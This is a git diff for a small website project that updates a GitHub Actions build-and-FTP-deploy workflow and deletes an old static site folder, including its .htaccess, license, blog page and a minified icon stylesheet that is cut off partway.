diff --git a/.github/workflows/deploy.yml b/.github/workflows/deploy.yml index bd576ce..2875ea9 100644 --- a/.github/workflows/deploy.yml +++ b/.github/workflows/deploy.yml @@ -10,7 +10,8 @@ on: jobs: build: runs-on: ubuntu-latest - + environment: deploy + steps: - name: Checkout code uses: actions/checkout@v4 @@ -27,7 +28,14 @@ jobs: - name: Build static export run: npm run build # This will run next build which generates the 'out' directory - - name: Deploy to FTP + - name: Verify build output + run: | + echo "Checking if build succeeded..." + ls -la out/ + echo "Build output files:" + find out/ -type f | head -10 + + - name: Deploy to FTP (Production) if: github.event_name == 'push' && startsWith(github.ref, 'refs/tags/v') uses: SamKirkland/FTP-Deploy-Action@4.3.0 with: @@ -35,6 +43,11 @@ jobs: username: ${{ secrets.FTP_USERNAME }} password: ${{ secrets.FTP_PASSWORD }} local-dir: ./out/ - # Update this to your target directory on the FTP server - server-dir: /www # Change this to your desired directory path on the server + server-dir: ./ + exclude: | + **/.git* + **/.git*/** + **/node_modules/** + **/.DS_Store + dry-run: false diff --git a/old/.htaccess b/old/.htaccess deleted file mode 100644 index 376fa73..0000000 --- a/old/.htaccess +++ /dev/null @@ -1,10 +0,0 @@ -RewriteEngine On -RewriteBase / - -# Redirecionar /blog para /blog.html -RewriteRule ^blog/?$ /blog.html [L,R=301] - -# Redirecionar todas as URLs não encontradas para a home -RewriteCond %{REQUEST_FILENAME} !-f -RewriteCond %{REQUEST_FILENAME} !-d -RewriteRule ^(.*)$ / [L,R=301] \ No newline at end of file diff --git a/old/LICENSE b/old/LICENSE deleted file mode 100644 index 6a8cb08..0000000 --- a/old/LICENSE +++ /dev/null @@ -1,21 +0,0 @@ -MIT License - -Copyright (c) 2024 HelpDEV - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. diff --git a/old/README.md b/old/README.md deleted file mode 100644 index 0252025..0000000 --- a/old/README.md +++ /dev/null @@ -1,2 +0,0 @@ -# helpdev.com.br -Helpdev site diff --git a/old/blog.html b/old/blog.html deleted file mode 100644 index 8962add..0000000 --- a/old/blog.html +++ /dev/null @@ -1,2128 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - @_helpdev - - - - - - - - - - - - - - HelpDev Blog - - - - - - - - -
-
-
-
-
-
- - @_helpdev Profile Picture - - HelpDev - Blog -
-
-
-
- -
-
-
-
-
-
- - - - - - - - - - \ No newline at end of file diff --git a/old/css/all.min.css b/old/css/all.min.css deleted file mode 100644 index 8054bde..0000000 --- a/old/css/all.min.css +++ /dev/null @@ -1,5 +0,0 @@ -/*! - * Font Awesome Pro 5.15.4 by @fontawesome - https://fontawesome.com - * License - https://fontawesome.com/license (Commercial License) - */ -.fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float:left}.fa-pull-right{float:right}.fa.fa-pull-left,.fab.fa-pull-left,.fal.fa-pull-left,.far.fa-pull-left,.fas.fa-pull-left{margin-right:.3em}.fa.fa-pull-right,.fab.fa-pull-right,.fal.fa-pull-right,.far.fa-pull-right,.fas.fa-pull-right{margin-left:.3em}.fa-spin{-webkit-animation:fa-spin 2s linear infinite;animation:fa-spin 2s linear infinite}.fa-pulse{-webkit-animation:fa-spin 1s steps(8) infinite;animation:fa-spin 1s steps(8) infinite}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}.fa-rotate-90{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";-webkit-transform:rotate(90deg);transform:rotate(90deg)}.fa-rotate-180{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";-webkit-transform:rotate(180deg);transform:rotate(180deg)}.fa-rotate-270{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";-webkit-transform:rotate(270deg);transform:rotate(270deg)}.fa-flip-horizontal{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";-webkit-transform:scaleX(-1);transform:scaleX(-1)}.fa-flip-vertical{-webkit-transform:scaleY(-1);transform:scaleY(-1)}.fa-flip-both,.fa-flip-horizontal.fa-flip-vertical,.fa-flip-vertical{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)"}.fa-flip-both,.fa-flip-horizontal.fa-flip-vertical{-webkit-transform:scale(-1);transform:scale(-1)}:root .fa-flip-both,:root .fa-flip-horizontal,:root .fa-flip-vertical,:root .fa-rotate-90,:root .fa-rotate-180,:root .fa-rotate-270{-webkit-filter:none;filter:none}.fa-stack{display:inline-block;height:2em;line-height:2em;position:relative;vertical-align:middle;width:2.5em}.fa-stack-1x,.fa-stack-2x{left:0;position:absolute;text-align:center;width:100%}.fa-stack-1x{line-height:inherit}.fa-stack-2x{font-size:2em}.fa-inverse{color:#fff}.fa-500px:before{content:"\f26e"}.fa-abacus:before{content:"\f640"}.fa-accessible-icon:before{content:"\f368"}.fa-accusoft:before{content:"\f369"}.fa-acorn:before{content:"\f6ae"}.fa-acquisitions-incorporated:before{content:"\f6af"}.fa-ad:before{content:"\f641"}.fa-address-book:before{content:"\f2b9"}.fa-address-card:before{content:"\f2bb"}.fa-adjust:before{content:"\f042"}.fa-adn:before{content:"\f170"}.fa-adversal:before{content:"\f36a"}.fa-affiliatetheme:before{content:"\f36b"}.fa-air-conditioner:before{content:"\f8f4"}.fa-air-freshener:before{content:"\f5d0"}.fa-airbnb:before{content:"\f834"}.fa-alarm-clock:before{content:"\f34e"}.fa-alarm-exclamation:before{content:"\f843"}.fa-alarm-plus:before{content:"\f844"}.fa-alarm-snooze:before{content:"\f845"}.fa-album:before{content:"\f89f"}.fa-album-collection:before{content:"\f8a0"}.fa-algolia:before{content:"\f36c"}.fa-alicorn:before{content:"\f6b0"}.fa-alien:before{content:"\f8f5"}.fa-alien-monster:before{content:"\f8f6"}.fa-align-center:before{content:"\f037"}.fa-align-justify:before{content:"\f039"}.fa-align-left:before{content:"\f036"}.fa-align-right:before{content:"\f038"}.fa-align-slash:before{content:"\f846"}.fa-alipay:before{content:"\f642"}.fa-allergies:before{content:"\f461"}.fa-amazon:before{content:"\f270"}.fa-amazon-pay:before{content:"\f42c"}.fa-ambulance:before{content:"\f0f9"}.fa-american-sign-language-interpreting:before{content:"\f2a3"}.fa-amilia:before{content:"\f36d"}.fa-amp-guitar:before{content:"\f8a1"}.fa-analytics:before{content:"\f643"}.fa-anchor:before{content:"\f13d"}.fa-android:before{content:"\f17b"}.fa-angel:before{content:"\f779"}.fa-angellist:before{content:"\f209"}.fa-angle-double-down:before{content:"\f103"}.fa-angle-double-left:before{content:"\f100"}.fa-angle-double-right:before{content:"\f101"}.fa-angle-double-up:before{content:"\f102"}.fa-angle-down:before{content:"\f107"}.fa-angle-left:before{content:"\f104"}.fa-angle-right:before{content:"\f105"}.fa-angle-up:before{content:"\f106"}.fa-angry:before{content:"\f556"}.fa-angrycreative:before{content:"\f36e"}.fa-angular:before{content:"\f420"}.fa-ankh:before{content:"\f644"}.fa-app-store:before{content:"\f36f"}.fa-app-store-ios:before{content:"\f370"}.fa-apper:before{content:"\f371"}.fa-apple:before{content:"\f179"}.fa-apple-alt:before{content:"\f5d1"}.fa-apple-crate:before{content:"\f6b1"}.fa-apple-pay:before{content:"\f415"}.fa-archive:before{content:"\f187"}.fa-archway:before{content:"\f557"}.fa-arrow-alt-circle-down:before{content:"\f358"}.fa-arrow-alt-circle-left:before{content:"\f359"}.fa-arrow-alt-circle-right:before{content:"\f35a"}.fa-arrow-alt-circle-up:before{content:"\f35b"}.fa-arrow-alt-down:before{content:"\f354"}.fa-arrow-alt-from-bottom:before{content:"\f346"}.fa-arrow-alt-from-left:before{content:"\f347"}.fa-arrow-alt-from-right:before{content:"\f348"}.fa-arrow-alt-from-top:before{content:"\f349"}.fa-arrow-alt-left:before{content:"\f355"}.fa-arrow-alt-right:before{content:"\f356"}.fa-arrow-alt-square-down:before{content:"\f350"}.fa-arrow-alt-square-left:before{content:"\f351"}.fa-arrow-alt-square-right:before{content:"\f352"}.fa-arrow-alt-square-up:before{content:"\f353"}.fa-arrow-alt-to-bottom:before{content:"\f34a"}.fa-arrow-alt-to-left:before{content:"\f34b"}.fa-arrow-alt-to-right:before{content:"\f34c"}.fa-arrow-alt-to-top:before{content:"\f34d"}.fa-arrow-alt-up:before{content:"\f357"}.fa-arrow-circle-down:before{content:"\f0ab"}.fa-arrow-circle-left:before{content:"\f0a8"}.fa-arrow-circle-right:before{content:"\f0a9"}.fa-arrow-circle-up:before{content:"\f0aa"}.fa-arrow-down:before{content:"\f063"}.fa-arrow-from-bottom:before{content:"\f342"}.fa-arrow-from-left:before{content:"\f343"}.fa-arrow-from-right:before{content:"\f344"}.fa-arrow-from-top:before{content:"\f345"}.fa-arrow-left:before{content:"\f060"}.fa-arrow-right:before{content:"\f061"}.fa-arrow-square-down:before{content:"\f339"}.fa-arrow-square-left:before{content:"\f33a"}.fa-arrow-square-right:before{content:"\f33b"}.fa-arrow-square-up:before{content:"\f33c"}.fa-arrow-to-bottom:before{content:"\f33d"}.fa-arrow-to-left:before{content:"\f33e"}.fa-arrow-to-right:before{content:"\f340"}.fa-arrow-to-top:before{content:"\f341"}.fa-arrow-up:before{content:"\f062"}.fa-arrows:before{content:"\f047"}.fa-arrows-alt:before{content:"\f0b2"}.fa-arrows-alt-h:before{content:"\f337"}.fa-arrows-alt-v:before{content:"\f338"}.fa-arrows-h:before{content:"\f07e"}.fa-arrows-v:before{content:"\f07d"}.fa-artstation:before{content:"\f77a"}.fa-assistive-listening-systems:before{content:"\f2a2"}.fa-asterisk:before{content:"\f069"}.fa-asymmetrik:before{content:"\f372"}.fa-at:before{content:"\f1fa"}.fa-atlas:before{content:"\f558"}.fa-atlassian:before{content:"\f77b"}.fa-atom:before{content:"\f5d2"}.fa-atom-alt:before{content:"\f5d3"}.fa-audible:before{content:"\f373"}.fa-audio-description:before{content:"\f29e"}.fa-autoprefixer:before{content:"\f41c"}.fa-avianex:before{content:"\f374"}.fa-aviato:before{content:"\f421"}.fa-award:before{content:"\f559"}.fa-aws:before{content:"\f375"}.fa-axe:before{content:"\f6b2"}.fa-axe-battle:before{content:"\f6b3"}.fa-baby:before{content:"\f77c"}.fa-baby-carriage:before{content:"\f77d"}.fa-backpack:before{content:"\f5d4"}.fa-backspace:before{content:"\f55a"}.fa-backward:before{content:"\f04a"}.fa-bacon:before{content:"\f7e5"}.fa-bacteria:before{content:"\e059"}.fa-bacterium:before{content:"\e05a"}.fa-badge:before{content:"\f335"}.fa-badge-check:before{content:"\f336"}.fa-badge-dollar:before{content:"\f645"}.fa-badge-percent:before{content:"\f646"}.fa-badge-sheriff:before{content:"\f8a2"}.fa-badger-honey:before{content:"\f6b4"}.fa-bags-shopping:before{content:"\f847"}.fa-bahai:before{content:"\f666"}.fa-balance-scale:before{content:"\f24e"}.fa-balance-scale-left:before{content:"\f515"}.fa-balance-scale-right:before{content:"\f516"}.fa-ball-pile:before{content:"\f77e"}.fa-ballot:before{content:"\f732"}.fa-ballot-check:before{content:"\f733"}.fa-ban:before{content:"\f05e"}.fa-band-aid:before{content:"\f462"}.fa-bandcamp:before{content:"\f2d5"}.fa-banjo:before{content:"\f8a3"}.fa-barcode:before{content:"\f02a"}.fa-barcode-alt:before{content:"\f463"}.fa-barcode-read:before{content:"\f464"}.fa-barcode-scan:before{content:"\f465"}.fa-bars:before{content:"\f0c9"}.fa-baseball:before{content:"\f432"}.fa-baseball-ball:before{content:"\f433"}.fa-basketball-ball:before{content:"\f434"}.fa-basketball-hoop:before{content:"\f435"}.fa-bat:before{content:"\f6b5"}.fa-bath:before{content:"\f2cd"}.fa-battery-bolt:before{content:"\f376"}.fa-battery-empty:before{content:"\f244"}.fa-battery-full:before{content:"\f240"}.fa-battery-half:before{content:"\f242"}.fa-battery-quarter:before{content:"\f243"}.fa-battery-slash:before{content:"\f377"}.fa-battery-three-quarters:before{content:"\f241"}.fa-battle-net:before{content:"\f835"}.fa-bed:before{content:"\f236"}.fa-bed-alt:before{content:"\f8f7"}.fa-bed-bunk:before{content:"\f8f8"}.fa-bed-empty:before{content:"\f8f9"}.fa-beer:before{content:"\f0fc"}.fa-behance:before{content:"\f1b4"}.fa-behance-square:before{content:"\f1b5"}.fa-bell:before{content:"\f0f3"}.fa-bell-exclamation:before{content:"\f848"}.fa-bell-on:before{content:"\f8fa"}.fa-bell-plus:before{content:"\f849"}.fa-bell-school:before{content:"\f5d5"}.fa-bell-school-slash:before{content:"\f5d6"}.fa-bell-slash:before{content:"\f1f6"}.fa-bells:before{content:"\f77f"}.fa-betamax:before{content:"\f8a4"}.fa-bezier-curve:before{content:"\f55b"}.fa-bible:before{content:"\f647"}.fa-bicycle:before{content:"\f206"}.fa-biking:before{content:"\f84a"}.fa-biking-mountain:before{content:"\f84b"}.fa-bimobject:before{content:"\f378"}.fa-binoculars:before{content:"\f1e5"}.fa-biohazard:before{content:"\f780"}.fa-birthday-cake:before{content:"\f1fd"}.fa-bitbucket:before{content:"\f171"}.fa-bitcoin:before{content:"\f379"}.fa-bity:before{content:"\f37a"}.fa-black-tie:before{content:"\f27e"}.fa-blackberry:before{content:"\f37b"}.fa-blanket:before{content:"\f498"}.fa-blender:before{content:"\f517"}.fa-blender-phone:before{content:"\f6b6"}.fa-blind:before{content:"\f29d"}.fa-blinds:before{content:"\f8fb"}.fa-blinds-open:before{content:"\f8fc"}.fa-blinds-raised:before{content:"\f8fd"}.fa-blog:before{content:"\f781"}.fa-blogger:before{content:"\f37c"}.fa-blogger-b:before{content:"\f37d"}.fa-bluetooth:before{content:"\f293"}.fa-bluetooth-b:before{content:"\f294"}.fa-bold:before{content:"\f032"}.fa-bolt:before{content:"\f0e7"}.fa-bomb:before{content:"\f1e2"}.fa-bone:before{content:"\f5d7"}.fa-bone-break:before{content:"\f5d8"}.fa-bong:before{content:"\f55c"}.fa-book:before{content:"\f02d"}.fa-book-alt:before{content:"\f5d9"}.fa-book-dead:before{content:"\f6b7"}.fa-book-heart:before{content:"\f499"}.fa-book-medical:before{content:"\f7e6"}.fa-book-open:before{content:"\f518"}.fa-book-reader:before{content:"\f5da"}.fa-book-spells:before{content:"\f6b8"}.fa-book-user:before{content:"\f7e7"}.fa-bookmark:before{content:"\f02e"}.fa-books:before{content:"\f5db"}.fa-books-medical:before{content:"\f7e8"}.fa-boombox:before{content:"\f8a5"}.fa-boot:before{content:"\f782"}.fa-booth-curtain:before{content:"\f734"}.fa-bootstrap:before{content:"\f836"}.fa-border-all:before{content:"\f84c"}.fa-border-bottom:before{content:"\f84d"}.fa-border-center-h:before{content:"\f89c"}.fa-border-center-v:before{content:"\f89d"}.fa-border-inner:before{content:"\f84e"}.fa-border-left:before{content:"\f84f"}.fa-border-none:before{content:"\f850"}.fa-border-outer:before{content:"\f851"}.fa-border-right:before{content:"\f852"}.fa-border-style:before{content:"\f853"}.fa-border-style-alt:before{content:"\f854"}.fa-border-top:before{content:"\f855"}.fa-bow-arrow:before{content:"\f6b9"}.fa-bowling-ball:before{content:"\f436"}.fa-bowling-pins:before{content:"\f437"}.fa-box:before{content:"\f466"}.fa-box-alt:before{content:"\f49a"}.fa-box-ballot:before{content:"\f735"}.fa-box-check:before{content:"\f467"}.fa-box-fragile:before{content:"\f49b"}.fa-box-full:before{content:"\f49c"}.fa-box-heart:before{content:"\f49d"}.fa-box-open:before{content:"\f49e"}.fa-box-tissue:before{content:"\e05b"}.fa-box-up:before{content:"\f49f"}.fa-box-usd:before{content:"\f4a0"}.fa-boxes:before{content:"\f468"}.fa-boxes-alt:before{content:"\f4a1"}.fa-boxing-glove:before{content:"\f438"}.fa-brackets:before{content:"\f7e9"}.fa-brackets-curly:before{content:"\f7ea"}.fa-braille:before{content:"\f2a1"}.fa-brain:before{content:"\f5dc"}.fa-bread-loaf:before{content:"\f7eb"}.fa-bread-slice:before{content:"\f7ec"}.fa-briefcase:before{content:"\f0b1"}.fa-briefcase-medical:before{content:"\f469"}.fa-bring-forward:before{content:"\f856"}.fa-bring-front:before{content:"\f857"}.fa-broadcast-tower:before{content:"\f519"}.fa-broom:before{content:"\f51a"}.fa-browser:before{content:"\f37e"}.fa-brush:before{content:"\f55d"}.fa-btc:before{content:"\f15a"}.fa-buffer:before{content:"\f837"}.fa-bug:before{content:"\f188"}.fa-building:before{content:"\f1ad"}.fa-bullhorn:before{content:"\f0a1"}.fa-bullseye:before{content:"\f140"}.fa-bullseye-arrow:before{content:"\f648"}.fa-bullseye-pointer:before{content:"\f649"}.fa-burger-soda:before{content:"\f858"}.fa-burn:before{content:"\f46a"}.fa-buromobelexperte:before{content:"\f37f"}.fa-burrito:before{content:"\f7ed"}.fa-bus:before{content:"\f207"}.fa-bus-alt:before{content:"\f55e"}.fa-bus-school:before{content:"\f5dd"}.fa-business-time:before{content:"\f64a"}.fa-buy-n-large:before{content:"\f8a6"}.fa-buysellads:before{content:"\f20d"}.fa-cabinet-filing:before{content:"\f64b"}.fa-cactus:before{content:"\f8a7"}.fa-calculator:before{content:"\f1ec"}.fa-calculator-alt:before{content:"\f64c"}.fa-calendar:before{content:"\f133"}.fa-calendar-alt:before{content:"\f073"}.fa-calendar-check:before{content:"\f274"}.fa-calendar-day:before{content:"\f783"}.fa-calendar-edit:before{content:"\f333"}.fa-calendar-exclamation:before{content:"\f334"}.fa-calendar-minus:before{content:"\f272"}.fa-calendar-plus:before{content:"\f271"}.fa-calendar-star:before{content:"\f736"}.fa-calendar-times:before{content:"\f273"}.fa-calendar-week:before{content:"\f784"}.fa-camcorder:before{content:"\f8a8"}.fa-camera:before{content:"\f030"}.fa-camera-alt:before{content:"\f332"}.fa-camera-home:before{content:"\f8fe"}.fa-camera-movie:before{content:"\f8a9"}.fa-camera-polaroid:before{content:"\f8aa"}.fa-camera-retro:before{content:"\f083"}.fa-campfire:before{content:"\f6ba"}.fa-campground:before{content:"\f6bb"}.fa-canadian-maple-leaf:before{content:"\f785"}.fa-candle-holder:before{content:"\f6bc"}.fa-candy-cane:before{content:"\f786"}.fa-candy-corn:before{content:"\f6bd"}.fa-cannabis:before{content:"\f55f"}.fa-capsules:before{content:"\f46b"}.fa-car:before{content:"\f1b9"}.fa-car-alt:before{content:"\f5de"}.fa-car-battery:before{content:"\f5df"}.fa-car-building:before{content:"\f859"}.fa-car-bump:before{content:"\f5e0"}.fa-car-bus:before{content:"\f85a"}.fa-car-crash:before{content:"\f5e1"}.fa-car-garage:before{content:"\f5e2"}.fa-car-mechanic:before{content:"\f5e3"}.fa-car-side:before{content:"\f5e4"}.fa-car-tilt:before{content:"\f5e5"}.fa-car-wash:before{content:"\f5e6"}.fa-caravan:before{content:"\f8ff"}.fa-caravan-alt:before{content:"\e000"}.fa-caret-circle-down:before{content:"\f32d"}.fa-caret-circle-left:before{content:"\f32e"}.fa-caret-circle-right:before{content:"\f330"}.fa-caret-circle-up:before{content:"\f331"}.fa-caret-down:before{content:"\f0d7"}.fa-caret-left:before{content:"\f0d9"}.fa-caret-right:before{content:"\f0da"}.fa-caret-square-down:before{content:"\f150"}.fa-caret-square-left:before{content:"\f191"}.fa-caret-square-right:before{content:"\f152"}.fa-caret-square-up:before{content:"\f151"}.fa-caret-up:before{content:"\f0d8"}.fa-carrot:before{content:"\f787"}.fa-cars:before{content:"\f85b"}.fa-cart-arrow-down:before{content:"\f218"}.fa-cart-plus:before{content:"\f217"}.fa-cash-register:before{content:"\f788"}.fa-cassette-tape:before{content:"\f8ab"}.fa-cat:before{content:"\f6be"}.fa-cat-space:before{content:"\e001"}.fa-cauldron:before{content:"\f6bf"}.fa-cc-amazon-pay:before{content:"\f42d"}.fa-cc-amex:before{content:"\f1f3"}.fa-cc-apple-pay:before{content:"\f416"}.fa-cc-diners-club:before{content:"\f24c"}.fa-cc-discover:before{content:"\f1f2"}.fa-cc-jcb:before{content:"\f24b"}.fa-cc-mastercard:before{content:"\f1f1"}.fa-cc-paypal:before{content:"\f1f4"}.fa-cc-stripe:before{content:"\f1f5"}.fa-cc-visa:before{content:"\f1f0"}.fa-cctv:before{content:"\f8ac"}.fa-centercode:before{content:"\f380"}.fa-centos:before{content:"\f789"}.fa-certificate:before{content:"\f0a3"}.fa-chair:before{content:"\f6c0"}.fa-chair-office:before{content:"\f6c1"}.fa-chalkboard:before{content:"\f51b"}.fa-chalkboard-teacher:before{content:"\f51c"}.fa-charging-station:before{content:"\f5e7"}.fa-chart-area:before{content:"\f1fe"}.fa-chart-bar:before{content:"\f080"}.fa-chart-line:before{content:"\f201"}.fa-chart-line-down:before{content:"\f64d"}.fa-chart-network:before{content:"\f78a"}.fa-chart-pie:before{content:"\f200"}.fa-chart-pie-alt:before{content:"\f64e"}.fa-chart-scatter:before{content:"\f7ee"}.fa-check:before{content:"\f00c"}.fa-check-circle:before{content:"\f058"}.fa-check-double:before{content:"\f560"}.fa-check-square:before{content:"\f14a"}.fa-cheese:before{content:"\f7ef"}.fa-cheese-swiss:before{content:"\f7f0"}.fa-cheeseburger:before{content:"\f7f1"}.fa-chess:before{content:"\f439"}.fa-chess-bishop:before{content:"\f43a"}.fa-chess-bishop-alt:before{content:"\f43b"}.fa-chess-board:before{content:"\f43c"}.fa-chess-clock:before{content:"\f43d"}.fa-chess-clock-alt:before{content:"\f43e"}.fa-chess-king:before{content:"\f43f"}.fa-chess-king-alt:before{content:"\f440"}.fa-chess-knight:before{content:"\f441"}.fa-chess-knight-alt:before{content:"\f442"}.fa-chess-pawn:before{content:"\f443"}.fa-chess-pawn-alt:before{content:"\f444"}.fa-chess-queen:before{content:"\f445"}.fa-chess-queen-alt:before{content:"\f446"}.fa-chess-rook:before{content:"\f447"}.fa-chess-rook-alt:before{content:"\f448"}.fa-chevron-circle-down:before{content:"\f13a"}.fa-chevron-circle-left:before{content:"\f137"}.fa-chevron-circle-right:before{content:"\f138"}.fa-chevron-circle-up:before{content:"\f139"}.fa-chevron-double-down:before{content:"\f322"}.fa-chevron-double-left:before{content:"\f323"}.fa-chevron-double-right:before{content:"\f324"}.fa-chevron-double-up:before{content:"\f325"}.fa-chevron-down:before{content:"\f078"}.fa-chevron-left:before{content:"\f053"}.fa-chevron-right:before{content:"\f054"}.fa-chevron-square-down:before{content:"\f329"}.fa-chevron-square-left:before{content:"\f32a"}.fa-chevron-square-right:before{content:"\f32b"}.fa-chevron-square-up:before{content:"\f32c"}.fa-chevron-up:before{content:"\f077"}.fa-child:before{content:"\f1ae"}.fa-chimney:before{content:"\f78b"}.fa-chrome:before{content:"\f268"}.fa-chromecast:before{content:"\f838"}.fa-church:before{content:"\f51d"}.fa-circle:before{content:"\f111"}.fa-circle-notch:before{content:"\f1ce"}.fa-city:before{content:"\f64f"}.fa-clarinet:before{content:"\f8ad"}.fa-claw-marks:before{content:"\f6c2"}.fa-clinic-medical:before{content:"\f7f2"}.fa-clipboard:before{content:"\f328"}.fa-clipboard-check:before{content:"\f46c"}.fa-clipboard-list:before{content:"\f46d"}.fa-clipboard-list-check:before{content:"\f737"}.fa-clipboard-prescription:before{content:"\f5e8"}.fa-clipboard-user:before{content:"\f7f3"}.fa-clock:before{content:"\f017"}.fa-clone:before{content:"\f24d"}.fa-closed-captioning:before{content:"\f20a"}.fa-cloud:before{content:"\f0c2"}.fa-cloud-download:before{content:"\f0ed"}.fa-cloud-download-alt:before{content:"\f381"}.fa-cloud-drizzle:before{content:"\f738"}.fa-cloud-hail:before{content:"\f739"}.fa-cloud-hail-mixed:before{content:"\f73a"}.fa-cloud-meatball:before{content:"\f73b"}.fa-cloud-moon:before{content:"\f6c3"}.fa-cloud-moon-rain:before{content:"\f73c"}.fa-cloud-music:before{content:"\f8ae"}.fa-cloud-rain:before{content:"\f73d"}.fa-cloud-rainbow:before{content:"\f73e"}.fa-cloud-showers:before{content:"\f73f"}.fa-cloud-showers-heavy:before{content:"\f740"}.fa-cloud-sleet:before{content:"\f741"}.fa-cloud-snow:before{content:"\f742"}.fa-cloud-sun:before{content:"\f6c4"}.fa-cloud-sun-rain:before{content:"\f743"}.fa-cloud-upload:before{content:"\f0ee"}.fa-cloud-upload-alt:before{content:"\f382"}.fa-cloudflare:before{content:"\e07d"}.fa-clouds:before{content:"\f744"}.fa-clouds-moon:before{content:"\f745"}.fa-clouds-sun:before{content:"\f746"}.fa-cloudscale:before{content:"\f383"}.fa-cloudsmith:before{content:"\f384"}.fa-cloudversify:before{content:"\f385"}.fa-club:before{content:"\f327"}.fa-cocktail:before{content:"\f561"}.fa-code:before{content:"\f121"}.fa-code-branch:before{content:"\f126"}.fa-code-commit:before{content:"\f386"}.fa-code-merge:before{content:"\f387"}.fa-codepen:before{content:"\f1cb"}.fa-codiepie:before{content:"\f284"}.fa-coffee:before{content:"\f0f4"}.fa-coffee-pot:before{content:"\e002"}.fa-coffee-togo:before{content:"\f6c5"}.fa-coffin:before{content:"\f6c6"}.fa-coffin-cross:before{content:"\e051"}.fa-cog:before{content:"\f013"}.fa-cogs:before{content:"\f085"}.fa-coin:before{content:"\f85c"}.fa-coins:before{content:"\f51e"}.fa-columns:before{content:"\f0db"}.fa-comet:before{content:"\e003"}.fa-comment:before{content:"\f075"}.fa-comment-alt:before{content:"\f27a"}.fa-comment-alt-check:before{content:"\f4a2"}.fa-comment-alt-dollar:before{content:"\f650"}.fa-comment-alt-dots:before{content:"\f4a3"}.fa-comment-alt-edit:before{content:"\f4a4"}.fa-comment-alt-exclamation:before{content:"\f4a5"}.fa-comment-alt-lines:before{content:"\f4a6"}.fa-comment-alt-medical:before{content:"\f7f4"}.fa-comment-alt-minus:before{content:"\f4a7"}.fa-comment-alt-music:before{content:"\f8af"}.fa-comment-alt-plus:before{content:"\f4a8"}.fa-comment-alt-slash:before{content:"\f4a9"}.fa-comment-alt-smile:before{content:"\f4aa"}.fa-comment-alt-times:before{content:"\f4ab"}.fa-comment-check:before{content:"\f4ac"}.fa-comment-dollar:before{content:"\f651"}.fa-comment-dots:before{content:"\f4ad"}.fa-comment-edit:before{content:"\f4ae"}.fa-comment-exclamation:before{content:"\f4af"}.fa-comment-lines:before{content:"\f4b0"}.fa-comment-medical:before{content:"\f7f5"}.fa-comment-minus:before{content:"\f4b1"}.fa-comment-music:before{content:"\f8b0"}.fa-comment-plus:before{content:"\f4b2"}.fa-comment-slash:before{content:"\f4b3"}.fa-comment-smile:before{content:"\f4b4"}.fa-comment-times:before{content:"\f4b5"}.fa-comments:before{content:"\f086"}.fa-comments-alt:before{content:"\f4b6"}.fa-comments-alt-dollar:before{content:"\f652"}.fa-comments-dollar:before{content:"\f653"}.fa-compact-disc:before{content:"\f51f"}.fa-compass:before{content:"\f14e"}.fa-compass-slash:before{content:"\f5e9"}.fa-compress:before{content:"\f066"}.fa-compress-alt:before{content:"\f422"}.fa-compress-arrows-alt:before{content:"\f78c"}.fa-compress-wide:before{content:"\f326"}.fa-computer-classic:before{content:"\f8b1"}.fa-computer-speaker:before{content:"\f8b2"}.fa-concierge-bell:before{content:"\f562"}.fa-confluence:before{content:"\f78d"}.fa-connectdevelop:before{content:"\f20e"}.fa-construction:before{content:"\f85d"}.fa-container-storage:before{content:"\f4b7"}.fa-contao:before{content:"\f26d"}.fa-conveyor-belt:before{content:"\f46e"}.fa-conveyor-belt-alt:before{content:"\f46f"}.fa-cookie:before{content:"\f563"}.fa-cookie-bite:before{content:"\f564"}.fa-copy:before{content:"\f0c5"}.fa-copyright:before{content:"\f1f9"}.fa-corn:before{content:"\f6c7"}.fa-cotton-bureau:before{content:"\f89e"}.fa-couch:before{content:"\f4b8"}.fa-cow:before{content:"\f6c8"}.fa-cowbell:before{content:"\f8b3"}.fa-cowbell-more:before{content:"\f8b4"}.fa-cpanel:before{content:"\f388"}.fa-creative-commons:before{content:"\f25e"}.fa-creative-commons-by:before{content:"\f4e7"}.fa-creative-commo